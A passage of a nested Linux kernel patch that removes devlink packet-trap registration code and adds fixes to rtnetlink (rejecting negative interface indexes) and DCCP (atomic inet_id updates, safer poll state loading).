+-	DEVLINK_TRAP_GROUP(LLDP),
+-	DEVLINK_TRAP_GROUP(MC_SNOOPING),
+-	DEVLINK_TRAP_GROUP(DHCP),
+-	DEVLINK_TRAP_GROUP(NEIGH_DISCOVERY),
+-	DEVLINK_TRAP_GROUP(BFD),
+-	DEVLINK_TRAP_GROUP(OSPF),
+-	DEVLINK_TRAP_GROUP(BGP),
+-	DEVLINK_TRAP_GROUP(VRRP),
+-	DEVLINK_TRAP_GROUP(PIM),
+-	DEVLINK_TRAP_GROUP(UC_LB),
+-	DEVLINK_TRAP_GROUP(LOCAL_DELIVERY),
+-	DEVLINK_TRAP_GROUP(EXTERNAL_DELIVERY),
+-	DEVLINK_TRAP_GROUP(IPV6),
+-	DEVLINK_TRAP_GROUP(PTP_EVENT),
+-	DEVLINK_TRAP_GROUP(PTP_GENERAL),
+-	DEVLINK_TRAP_GROUP(ACL_SAMPLE),
+-	DEVLINK_TRAP_GROUP(ACL_TRAP),
+-	DEVLINK_TRAP_GROUP(PARSER_ERROR_DROPS),
+-};
+-
+-static int devlink_trap_generic_verify(const struct devlink_trap *trap)
+-{
+-	if (trap->id > DEVLINK_TRAP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	if (strcmp(trap->name, devlink_trap_generic[trap->id].name))
+-		return -EINVAL;
+-
+-	if (trap->type != devlink_trap_generic[trap->id].type)
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_driver_verify(const struct devlink_trap *trap)
+-{
+-	int i;
+-
+-	if (trap->id <= DEVLINK_TRAP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_trap_generic); i++) {
+-		if (!strcmp(trap->name, devlink_trap_generic[i].name))
+-			return -EEXIST;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_verify(const struct devlink_trap *trap)
+-{
+-	if (!trap || !trap->name)
+-		return -EINVAL;
+-
+-	if (trap->generic)
+-		return devlink_trap_generic_verify(trap);
+-	else
+-		return devlink_trap_driver_verify(trap);
+-}
+-
+-static int
+-devlink_trap_group_generic_verify(const struct devlink_trap_group *group)
+-{
+-	if (group->id > DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	if (strcmp(group->name, devlink_trap_group_generic[group->id].name))
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_trap_group_driver_verify(const struct devlink_trap_group *group)
+-{
+-	int i;
+-
+-	if (group->id <= DEVLINK_TRAP_GROUP_GENERIC_ID_MAX)
+-		return -EINVAL;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_trap_group_generic); i++) {
+-		if (!strcmp(group->name, devlink_trap_group_generic[i].name))
+-			return -EEXIST;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_group_verify(const struct devlink_trap_group *group)
+-{
+-	if (group->generic)
+-		return devlink_trap_group_generic_verify(group);
+-	else
+-		return devlink_trap_group_driver_verify(group);
+-}
+-
+-static void
+-devlink_trap_group_notify(struct devlink *devlink,
+-			  const struct devlink_trap_group_item *group_item,
+-			  enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_GROUP_NEW &&
+-		     cmd != DEVLINK_CMD_TRAP_GROUP_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_trap_group_fill(msg, devlink, group_item, cmd, 0, 0,
+-					 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int
+-devlink_trap_item_group_link(struct devlink *devlink,
+-			     struct devlink_trap_item *trap_item)
+-{
+-	u16 group_id = trap_item->trap->init_group_id;
+-	struct devlink_trap_group_item *group_item;
+-
+-	group_item = devlink_trap_group_item_lookup_by_id(devlink, group_id);
+-	if (WARN_ON_ONCE(!group_item))
+-		return -EINVAL;
+-
+-	trap_item->group_item = group_item;
+-
+-	return 0;
+-}
+-
+-static void devlink_trap_notify(struct devlink *devlink,
+-				const struct devlink_trap_item *trap_item,
+-				enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_NEW &&
+-		     cmd != DEVLINK_CMD_TRAP_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_trap_fill(msg, devlink, trap_item, cmd, 0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int
+-devlink_trap_register(struct devlink *devlink,
+-		      const struct devlink_trap *trap, void *priv)
+-{
+-	struct devlink_trap_item *trap_item;
+-	int err;
+-
+-	if (devlink_trap_item_lookup(devlink, trap->name))
+-		return -EEXIST;
+-
+-	trap_item = kzalloc(sizeof(*trap_item), GFP_KERNEL);
+-	if (!trap_item)
+-		return -ENOMEM;
+-
+-	trap_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
+-	if (!trap_item->stats) {
+-		err = -ENOMEM;
+-		goto err_stats_alloc;
+-	}
+-
+-	trap_item->trap = trap;
+-	trap_item->action = trap->init_action;
+-	trap_item->priv = priv;
+-
+-	err = devlink_trap_item_group_link(devlink, trap_item);
+-	if (err)
+-		goto err_group_link;
+-
+-	err = devlink->ops->trap_init(devlink, trap, trap_item);
+-	if (err)
+-		goto err_trap_init;
+-
+-	list_add_tail(&trap_item->list, &devlink->trap_list);
+-	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
+-
+-	return 0;
+-
+-err_trap_init:
+-err_group_link:
+-	free_percpu(trap_item->stats);
+-err_stats_alloc:
+-	kfree(trap_item);
+-	return err;
+-}
+-
+-static void devlink_trap_unregister(struct devlink *devlink,
+-				    const struct devlink_trap *trap)
+-{
+-	struct devlink_trap_item *trap_item;
+-
+-	trap_item = devlink_trap_item_lookup(devlink, trap->name);
+-	if (WARN_ON_ONCE(!trap_item))
+-		return;
+-
+-	devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
+-	list_del(&trap_item->list);
+-	if (devlink->ops->trap_fini)
+-		devlink->ops->trap_fini(devlink, trap, trap_item);
+-	free_percpu(trap_item->stats);
+-	kfree(trap_item);
+-}
+-
+-static void devlink_trap_disable(struct devlink *devlink,
+-				 const struct devlink_trap *trap)
+-{
+-	struct devlink_trap_item *trap_item;
+-
+-	trap_item = devlink_trap_item_lookup(devlink, trap->name);
+-	if (WARN_ON_ONCE(!trap_item))
+-		return;
+-
+-	devlink->ops->trap_action_set(devlink, trap, DEVLINK_TRAP_ACTION_DROP,
+-				      NULL);
+-	trap_item->action = DEVLINK_TRAP_ACTION_DROP;
+-}
+-
+-/**
+- * devl_traps_register - Register packet traps with devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- * @priv: Driver private information.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devl_traps_register(struct devlink *devlink,
+-			const struct devlink_trap *traps,
+-			size_t traps_count, void *priv)
+-{
+-	int i, err;
+-
+-	if (!devlink->ops->trap_init || !devlink->ops->trap_action_set)
+-		return -EINVAL;
+-
+-	devl_assert_locked(devlink);
+-	for (i = 0; i < traps_count; i++) {
+-		const struct devlink_trap *trap = &traps[i];
+-
+-		err = devlink_trap_verify(trap);
+-		if (err)
+-			goto err_trap_verify;
+-
+-		err = devlink_trap_register(devlink, trap, priv);
+-		if (err)
+-			goto err_trap_register;
+-	}
+-
+-	return 0;
+-
+-err_trap_register:
+-err_trap_verify:
+-	for (i--; i >= 0; i--)
+-		devlink_trap_unregister(devlink, &traps[i]);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devl_traps_register);
+-
+-/**
+- * devlink_traps_register - Register packet traps with devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- * @priv: Driver private information.
+- *
+- * Context: Takes and release devlink->lock <mutex>.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devlink_traps_register(struct devlink *devlink,
+-			   const struct devlink_trap *traps,
+-			   size_t traps_count, void *priv)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_traps_register(devlink, traps, traps_count, priv);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_traps_register);
+-
+-/**
+- * devl_traps_unregister - Unregister packet traps from devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- */
+-void devl_traps_unregister(struct devlink *devlink,
+-			   const struct devlink_trap *traps,
+-			   size_t traps_count)
+-{
+-	int i;
+-
+-	devl_assert_locked(devlink);
+-	/* Make sure we do not have any packets in-flight while unregistering
+-	 * traps by disabling all of them and waiting for a grace period.
+-	 */
+-	for (i = traps_count - 1; i >= 0; i--)
+-		devlink_trap_disable(devlink, &traps[i]);
+-	synchronize_rcu();
+-	for (i = traps_count - 1; i >= 0; i--)
+-		devlink_trap_unregister(devlink, &traps[i]);
+-}
+-EXPORT_SYMBOL_GPL(devl_traps_unregister);
+-
+-/**
+- * devlink_traps_unregister - Unregister packet traps from devlink.
+- * @devlink: devlink.
+- * @traps: Packet traps.
+- * @traps_count: Count of provided packet traps.
+- *
+- * Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_traps_unregister(struct devlink *devlink,
+-			      const struct devlink_trap *traps,
+-			      size_t traps_count)
+-{
+-	devl_lock(devlink);
+-	devl_traps_unregister(devlink, traps, traps_count);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_traps_unregister);
+-
+-static void
+-devlink_trap_stats_update(struct devlink_stats __percpu *trap_stats,
+-			  size_t skb_len)
+-{
+-	struct devlink_stats *stats;
+-
+-	stats = this_cpu_ptr(trap_stats);
+-	u64_stats_update_begin(&stats->syncp);
+-	u64_stats_add(&stats->rx_bytes, skb_len);
+-	u64_stats_inc(&stats->rx_packets);
+-	u64_stats_update_end(&stats->syncp);
+-}
+-
+-static void
+-devlink_trap_report_metadata_set(struct devlink_trap_metadata *metadata,
+-				 const struct devlink_trap_item *trap_item,
+-				 struct devlink_port *in_devlink_port,
+-				 const struct flow_action_cookie *fa_cookie)
+-{
+-	metadata->trap_name = trap_item->trap->name;
+-	metadata->trap_group_name = trap_item->group_item->group->name;
+-	metadata->fa_cookie = fa_cookie;
+-	metadata->trap_type = trap_item->trap->type;
+-
+-	spin_lock(&in_devlink_port->type_lock);
+-	if (in_devlink_port->type == DEVLINK_PORT_TYPE_ETH)
+-		metadata->input_dev = in_devlink_port->type_dev;
+-	spin_unlock(&in_devlink_port->type_lock);
+-}
+-
+-/**
+- * devlink_trap_report - Report trapped packet to drop monitor.
+- * @devlink: devlink.
+- * @skb: Trapped packet.
+- * @trap_ctx: Trap context.
+- * @in_devlink_port: Input devlink port.
+- * @fa_cookie: Flow action cookie. Could be NULL.
+- */
+-void devlink_trap_report(struct devlink *devlink, struct sk_buff *skb,
+-			 void *trap_ctx, struct devlink_port *in_devlink_port,
+-			 const struct flow_action_cookie *fa_cookie)
+-
+-{
+-	struct devlink_trap_item *trap_item = trap_ctx;
+-
+-	devlink_trap_stats_update(trap_item->stats, skb->len);
+-	devlink_trap_stats_update(trap_item->group_item->stats, skb->len);
+-
+-	if (trace_devlink_trap_report_enabled()) {
+-		struct devlink_trap_metadata metadata = {};
+-
+-		devlink_trap_report_metadata_set(&metadata, trap_item,
+-						 in_devlink_port, fa_cookie);
+-		trace_devlink_trap_report(devlink, skb, &metadata);
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_report);
+-
+-/**
+- * devlink_trap_ctx_priv - Trap context to driver private information.
+- * @trap_ctx: Trap context.
+- *
+- * Return: Driver private information passed during registration.
+- */
+-void *devlink_trap_ctx_priv(void *trap_ctx)
+-{
+-	struct devlink_trap_item *trap_item = trap_ctx;
+-
+-	return trap_item->priv;
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_ctx_priv);
+-
+-static int
+-devlink_trap_group_item_policer_link(struct devlink *devlink,
+-				     struct devlink_trap_group_item *group_item)
+-{
+-	u32 policer_id = group_item->group->init_policer_id;
+-	struct devlink_trap_policer_item *policer_item;
+-
+-	if (policer_id == 0)
+-		return 0;
+-
+-	policer_item = devlink_trap_policer_item_lookup(devlink, policer_id);
+-	if (WARN_ON_ONCE(!policer_item))
+-		return -EINVAL;
+-
+-	group_item->policer_item = policer_item;
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_trap_group_register(struct devlink *devlink,
+-			    const struct devlink_trap_group *group)
+-{
+-	struct devlink_trap_group_item *group_item;
+-	int err;
+-
+-	if (devlink_trap_group_item_lookup(devlink, group->name))
+-		return -EEXIST;
+-
+-	group_item = kzalloc(sizeof(*group_item), GFP_KERNEL);
+-	if (!group_item)
+-		return -ENOMEM;
+-
+-	group_item->stats = netdev_alloc_pcpu_stats(struct devlink_stats);
+-	if (!group_item->stats) {
+-		err = -ENOMEM;
+-		goto err_stats_alloc;
+-	}
+-
+-	group_item->group = group;
+-
+-	err = devlink_trap_group_item_policer_link(devlink, group_item);
+-	if (err)
+-		goto err_policer_link;
+-
+-	if (devlink->ops->trap_group_init) {
+-		err = devlink->ops->trap_group_init(devlink, group);
+-		if (err)
+-			goto err_group_init;
+-	}
+-
+-	list_add_tail(&group_item->list, &devlink->trap_group_list);
+-	devlink_trap_group_notify(devlink, group_item,
+-				  DEVLINK_CMD_TRAP_GROUP_NEW);
+-
+-	return 0;
+-
+-err_group_init:
+-err_policer_link:
+-	free_percpu(group_item->stats);
+-err_stats_alloc:
+-	kfree(group_item);
+-	return err;
+-}
+-
+-static void
+-devlink_trap_group_unregister(struct devlink *devlink,
+-			      const struct devlink_trap_group *group)
+-{
+-	struct devlink_trap_group_item *group_item;
+-
+-	group_item = devlink_trap_group_item_lookup(devlink, group->name);
+-	if (WARN_ON_ONCE(!group_item))
+-		return;
+-
+-	devlink_trap_group_notify(devlink, group_item,
+-				  DEVLINK_CMD_TRAP_GROUP_DEL);
+-	list_del(&group_item->list);
+-	free_percpu(group_item->stats);
+-	kfree(group_item);
+-}
+-
+-/**
+- * devl_trap_groups_register - Register packet trap groups with devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devl_trap_groups_register(struct devlink *devlink,
+-			      const struct devlink_trap_group *groups,
+-			      size_t groups_count)
+-{
+-	int i, err;
+-
+-	devl_assert_locked(devlink);
+-	for (i = 0; i < groups_count; i++) {
+-		const struct devlink_trap_group *group = &groups[i];
+-
+-		err = devlink_trap_group_verify(group);
+-		if (err)
+-			goto err_trap_group_verify;
+-
+-		err = devlink_trap_group_register(devlink, group);
+-		if (err)
+-			goto err_trap_group_register;
+-	}
+-
+-	return 0;
+-
+-err_trap_group_register:
+-err_trap_group_verify:
+-	for (i--; i >= 0; i--)
+-		devlink_trap_group_unregister(devlink, &groups[i]);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_groups_register);
+-
+-/**
+- * devlink_trap_groups_register - Register packet trap groups with devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- *
+- * Context: Takes and release devlink->lock <mutex>.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int devlink_trap_groups_register(struct devlink *devlink,
+-				 const struct devlink_trap_group *groups,
+-				 size_t groups_count)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_trap_groups_register(devlink, groups, groups_count);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_groups_register);
+-
+-/**
+- * devl_trap_groups_unregister - Unregister packet trap groups from devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- */
+-void devl_trap_groups_unregister(struct devlink *devlink,
+-				 const struct devlink_trap_group *groups,
+-				 size_t groups_count)
+-{
+-	int i;
+-
+-	devl_assert_locked(devlink);
+-	for (i = groups_count - 1; i >= 0; i--)
+-		devlink_trap_group_unregister(devlink, &groups[i]);
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_groups_unregister);
+-
+-/**
+- * devlink_trap_groups_unregister - Unregister packet trap groups from devlink.
+- * @devlink: devlink.
+- * @groups: Packet trap groups.
+- * @groups_count: Count of provided packet trap groups.
+- *
+- * Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_trap_groups_unregister(struct devlink *devlink,
+-				    const struct devlink_trap_group *groups,
+-				    size_t groups_count)
+-{
+-	devl_lock(devlink);
+-	devl_trap_groups_unregister(devlink, groups, groups_count);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_trap_groups_unregister);
+-
+-static void
+-devlink_trap_policer_notify(struct devlink *devlink,
+-			    const struct devlink_trap_policer_item *policer_item,
+-			    enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON_ONCE(cmd != DEVLINK_CMD_TRAP_POLICER_NEW &&
+-		     cmd != DEVLINK_CMD_TRAP_POLICER_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item, cmd, 0,
+-					   0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int
+-devlink_trap_policer_register(struct devlink *devlink,
+-			      const struct devlink_trap_policer *policer)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	int err;
+-
+-	if (devlink_trap_policer_item_lookup(devlink, policer->id))
+-		return -EEXIST;
+-
+-	policer_item = kzalloc(sizeof(*policer_item), GFP_KERNEL);
+-	if (!policer_item)
+-		return -ENOMEM;
+-
+-	policer_item->policer = policer;
+-	policer_item->rate = policer->init_rate;
+-	policer_item->burst = policer->init_burst;
+-
+-	if (devlink->ops->trap_policer_init) {
+-		err = devlink->ops->trap_policer_init(devlink, policer);
+-		if (err)
+-			goto err_policer_init;
+-	}
+-
+-	list_add_tail(&policer_item->list, &devlink->trap_policer_list);
+-	devlink_trap_policer_notify(devlink, policer_item,
+-				    DEVLINK_CMD_TRAP_POLICER_NEW);
+-
+-	return 0;
+-
+-err_policer_init:
+-	kfree(policer_item);
+-	return err;
+-}
+-
+-static void
+-devlink_trap_policer_unregister(struct devlink *devlink,
+-				const struct devlink_trap_policer *policer)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-
+-	policer_item = devlink_trap_policer_item_lookup(devlink, policer->id);
+-	if (WARN_ON_ONCE(!policer_item))
+-		return;
+-
+-	devlink_trap_policer_notify(devlink, policer_item,
+-				    DEVLINK_CMD_TRAP_POLICER_DEL);
+-	list_del(&policer_item->list);
+-	if (devlink->ops->trap_policer_fini)
+-		devlink->ops->trap_policer_fini(devlink, policer);
+-	kfree(policer_item);
+-}
+-
+-/**
+- * devl_trap_policers_register - Register packet trap policers with devlink.
+- * @devlink: devlink.
+- * @policers: Packet trap policers.
+- * @policers_count: Count of provided packet trap policers.
+- *
+- * Return: Non-zero value on failure.
+- */
+-int
+-devl_trap_policers_register(struct devlink *devlink,
+-			    const struct devlink_trap_policer *policers,
+-			    size_t policers_count)
+-{
+-	int i, err;
+-
+-	devl_assert_locked(devlink);
+-	for (i = 0; i < policers_count; i++) {
+-		const struct devlink_trap_policer *policer = &policers[i];
+-
+-		if (WARN_ON(policer->id == 0 ||
+-			    policer->max_rate < policer->min_rate ||
+-			    policer->max_burst < policer->min_burst)) {
+-			err = -EINVAL;
+-			goto err_trap_policer_verify;
+-		}
+-
+-		err = devlink_trap_policer_register(devlink, policer);
+-		if (err)
+-			goto err_trap_policer_register;
+-	}
+-	return 0;
+-
+-err_trap_policer_register:
+-err_trap_policer_verify:
+-	for (i--; i >= 0; i--)
+-		devlink_trap_policer_unregister(devlink, &policers[i]);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_policers_register);
+-
+-/**
+- * devl_trap_policers_unregister - Unregister packet trap policers from devlink.
+- * @devlink: devlink.
+- * @policers: Packet trap policers.
+- * @policers_count: Count of provided packet trap policers.
+- */
+-void
+-devl_trap_policers_unregister(struct devlink *devlink,
+-			      const struct devlink_trap_policer *policers,
+-			      size_t policers_count)
+-{
+-	int i;
+-
+-	devl_assert_locked(devlink);
+-	for (i = policers_count - 1; i >= 0; i--)
+-		devlink_trap_policer_unregister(devlink, &policers[i]);
+-}
+-EXPORT_SYMBOL_GPL(devl_trap_policers_unregister);
+-
+-static void __devlink_compat_running_version(struct devlink *devlink,
+-					     char *buf, size_t len)
+-{
+-	struct devlink_info_req req = {};
+-	const struct nlattr *nlattr;
+-	struct sk_buff *msg;
+-	int rem, err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	req.msg = msg;
+-	err = devlink->ops->info_get(devlink, &req, NULL);
+-	if (err)
+-		goto free_msg;
+-
+-	nla_for_each_attr(nlattr, (void *)msg->data, msg->len, rem) {
+-		const struct nlattr *kv;
+-		int rem_kv;
+-
+-		if (nla_type(nlattr) != DEVLINK_ATTR_INFO_VERSION_RUNNING)
+-			continue;
+-
+-		nla_for_each_nested(kv, nlattr, rem_kv) {
+-			if (nla_type(kv) != DEVLINK_ATTR_INFO_VERSION_VALUE)
+-				continue;
+-
+-			strlcat(buf, nla_data(kv), len);
+-			strlcat(buf, " ", len);
+-		}
+-	}
+-free_msg:
+-	nlmsg_free(msg);
+-}
+-
+-static struct devlink_port *netdev_to_devlink_port(struct net_device *dev)
+-{
+-	if (!dev->netdev_ops->ndo_get_devlink_port)
+-		return NULL;
+-
+-	return dev->netdev_ops->ndo_get_devlink_port(dev);
+-}
+-
+-void devlink_compat_running_version(struct devlink *devlink,
+-				    char *buf, size_t len)
+-{
+-	if (!devlink->ops->info_get)
+-		return;
+-
+-	devl_lock(devlink);
+-	__devlink_compat_running_version(devlink, buf, len);
+-	devl_unlock(devlink);
+-}
+-
+-int devlink_compat_flash_update(struct devlink *devlink, const char *file_name)
+-{
+-	struct devlink_flash_update_params params = {};
+-	int ret;
+-
+-	if (!devlink->ops->flash_update)
+-		return -EOPNOTSUPP;
+-
+-	ret = request_firmware(&params.fw, file_name, devlink->dev);
+-	if (ret)
+-		return ret;
+-
+-	devl_lock(devlink);
+-	devlink_flash_update_begin_notify(devlink);
+-	ret = devlink->ops->flash_update(devlink, &params, NULL);
+-	devlink_flash_update_end_notify(devlink);
+-	devl_unlock(devlink);
+-
+-	release_firmware(params.fw);
+-
+-	return ret;
+-}
+-
+-int devlink_compat_phys_port_name_get(struct net_device *dev,
+-				      char *name, size_t len)
+-{
+-	struct devlink_port *devlink_port;
+-
+-	/* RTNL mutex is held here which ensures that devlink_port
+-	 * instance cannot disappear in the middle. No need to take
+-	 * any devlink lock as only permanent values are accessed.
+-	 */
+-	ASSERT_RTNL();
+-
+-	devlink_port = netdev_to_devlink_port(dev);
+-	if (!devlink_port)
+-		return -EOPNOTSUPP;
+-
+-	return __devlink_port_phys_port_name_get(devlink_port, name, len);
+-}
+-
+-int devlink_compat_switch_id_get(struct net_device *dev,
+-				 struct netdev_phys_item_id *ppid)
+-{
+-	struct devlink_port *devlink_port;
+-
+-	/* Caller must hold RTNL mutex or reference to dev, which ensures that
+-	 * devlink_port instance cannot disappear in the middle. No need to take
+-	 * any devlink lock as only permanent values are accessed.
+-	 */
+-	devlink_port = netdev_to_devlink_port(dev);
+-	if (!devlink_port || !devlink_port->switch_port)
+-		return -EOPNOTSUPP;
+-
+-	memcpy(ppid, &devlink_port->attrs.switch_id, sizeof(*ppid));
+-
+-	return 0;
+-}
+-
+-static void __net_exit devlink_pernet_pre_exit(struct net *net)
+-{
+-	struct devlink *devlink;
+-	u32 actions_performed;
+-	unsigned long index;
+-	int err;
+-
+-	/* In case network namespace is getting destroyed, reload
+-	 * all devlink instances from this namespace into init_net.
+-	 */
+-	devlinks_xa_for_each_registered_get(net, index, devlink) {
+-		WARN_ON(!(devlink->features & DEVLINK_F_RELOAD));
+-		mutex_lock(&devlink->lock);
+-		err = devlink_reload(devlink, &init_net,
+-				     DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
+-				     DEVLINK_RELOAD_LIMIT_UNSPEC,
+-				     &actions_performed, NULL);
+-		mutex_unlock(&devlink->lock);
+-		if (err && err != -EOPNOTSUPP)
+-			pr_warn("Failed to reload devlink instance into init_net\n");
+-		devlink_put(devlink);
+-	}
+-}
+-
+-static struct pernet_operations devlink_pernet_ops __net_initdata = {
+-	.pre_exit = devlink_pernet_pre_exit,
+-};
+-
+-static int __init devlink_init(void)
+-{
+-	int err;
+-
+-	err = genl_register_family(&devlink_nl_family);
+-	if (err)
+-		goto out;
+-	err = register_pernet_subsys(&devlink_pernet_ops);
+-
+-out:
+-	WARN_ON(err);
+-	return err;
+-}
+-
+-subsys_initcall(devlink_init);
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 2758b3f7c0214..9d4507aa736b7 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -2220,13 +2220,27 @@ out_err:
+ 	return err;
+ }
+ 
+-int rtnl_nla_parse_ifla(struct nlattr **tb, const struct nlattr *head, int len,
+-			struct netlink_ext_ack *exterr)
++int rtnl_nla_parse_ifinfomsg(struct nlattr **tb, const struct nlattr *nla_peer,
++			     struct netlink_ext_ack *exterr)
+ {
+-	return nla_parse_deprecated(tb, IFLA_MAX, head, len, ifla_policy,
++	const struct ifinfomsg *ifmp;
++	const struct nlattr *attrs;
++	size_t len;
++
++	ifmp = nla_data(nla_peer);
++	attrs = nla_data(nla_peer) + sizeof(struct ifinfomsg);
++	len = nla_len(nla_peer) - sizeof(struct ifinfomsg);
++
++	if (ifmp->ifi_index < 0) {
++		NL_SET_ERR_MSG_ATTR(exterr, nla_peer,
++				    "ifindex can't be negative");
++		return -EINVAL;
++	}
++
++	return nla_parse_deprecated(tb, IFLA_MAX, attrs, len, ifla_policy,
+ 				    exterr);
+ }
+-EXPORT_SYMBOL(rtnl_nla_parse_ifla);
++EXPORT_SYMBOL(rtnl_nla_parse_ifinfomsg);
+ 
+ struct net *rtnl_link_get_net(struct net *src_net, struct nlattr *tb[])
+ {
+@@ -3451,6 +3465,9 @@ replay:
+ 	if (ifm->ifi_index > 0) {
+ 		link_specified = true;
+ 		dev = __dev_get_by_index(net, ifm->ifi_index);
++	} else if (ifm->ifi_index < 0) {
++		NL_SET_ERR_MSG(extack, "ifindex can't be negative");
++		return -EINVAL;
+ 	} else if (tb[IFLA_IFNAME] || tb[IFLA_ALT_IFNAME]) {
+ 		link_specified = true;
+ 		dev = rtnl_dev_get(net, tb);
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index b780827f5e0a5..bfececa9e244e 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -130,7 +130,7 @@ int dccp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 						    inet->inet_daddr,
+ 						    inet->inet_sport,
+ 						    inet->inet_dport);
+-	inet->inet_id = get_random_u16();
++	atomic_set(&inet->inet_id, get_random_u16());
+ 
+ 	err = dccp_connect(sk);
+ 	rt = NULL;
+@@ -430,7 +430,7 @@ struct sock *dccp_v4_request_recv_sock(const struct sock *sk,
+ 	RCU_INIT_POINTER(newinet->inet_opt, rcu_dereference(ireq->ireq_opt));
+ 	newinet->mc_index  = inet_iif(skb);
+ 	newinet->mc_ttl	   = ip_hdr(skb)->ttl;
+-	newinet->inet_id   = get_random_u16();
++	atomic_set(&newinet->inet_id, get_random_u16());
+ 
+ 	if (dst == NULL && (dst = inet_csk_route_child_sock(sk, newsk, req)) == NULL)
+ 		goto put_and_exit;
+diff --git a/net/dccp/proto.c b/net/dccp/proto.c
+index abc02d25edc14..c522c76a9f89f 100644
+--- a/net/dccp/proto.c
++++ b/net/dccp/proto.c
+@@ -312,11 +312,15 @@ EXPORT_SYMBOL_GPL(dccp_disconnect);
+ __poll_t dccp_poll(struct file *file, struct socket *sock,
+ 		       poll_table *wait)
+ {
+-	__poll_t mask;
+ 	struct sock *sk = sock->sk;
++	__poll_t mask;
++	u8 shutdown;
++	int state;
+ 
+ 	sock_poll_wait(file, sock, wait);
+-	if (sk->sk_state == DCCP_LISTEN)
++
++	state = inet_sk_state_load(sk);
++	if (state == DCCP_LISTEN)
+ 		return inet_csk_listen_poll(sk);
+ 
+ 	/* Socket is not locked. We are protected from async events
